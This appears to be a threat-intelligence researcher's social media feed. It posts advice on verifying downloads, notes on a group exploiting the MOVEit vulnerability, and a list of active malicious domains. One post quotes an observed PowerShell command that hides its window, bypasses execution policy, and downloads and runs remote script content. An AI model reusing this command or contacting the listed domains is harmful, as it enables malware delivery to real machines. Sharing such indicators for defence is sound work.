ciphexe //infosec
@ciphexe.bsky.social
cyber security specialist / double dad / CTI
Embarrassing stuff 😬
February 14, 2025 at 8:31 PM
It is advised to verify domains before downloading software. Use Threat Intelligence tools to identify high-risk domains. Developers should validate packages before using third-party tools.

Source 🔗:
February 14, 2025 at 8:30 PM
The group often exploits known vulnerabilities such as the MOVEit Transfer vulnerability. To address the techniques used by the group, it is advised to: regularly update software (high risk being internet-facing), implement IDS and anomaly detection, awareness training and a data backup policy.
Source 🔗:
February 13, 2025 at 9:56 AM
Maybe relevant to you: @thetimesofisrael.bsky.social ?
January 29, 2025 at 9:55 PM
URLs seem to follow a feedbackguest[NUMBER].world pattern
- Examples of active malicious URLs:
feedbackguest485121.world
feedbackguest485100.world
reportguest4893921.world
January 21, 2025 at 10:23 PM
PS command:

"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$hl = (Invoke-WebRequest -Uri 'https://gitlab.com/pnp30/svn/-/raw/main/deploy.md' -UseBasicParsing).Content; Invoke-Expression -Command $hl"
January 21, 2025 at 10:23 PM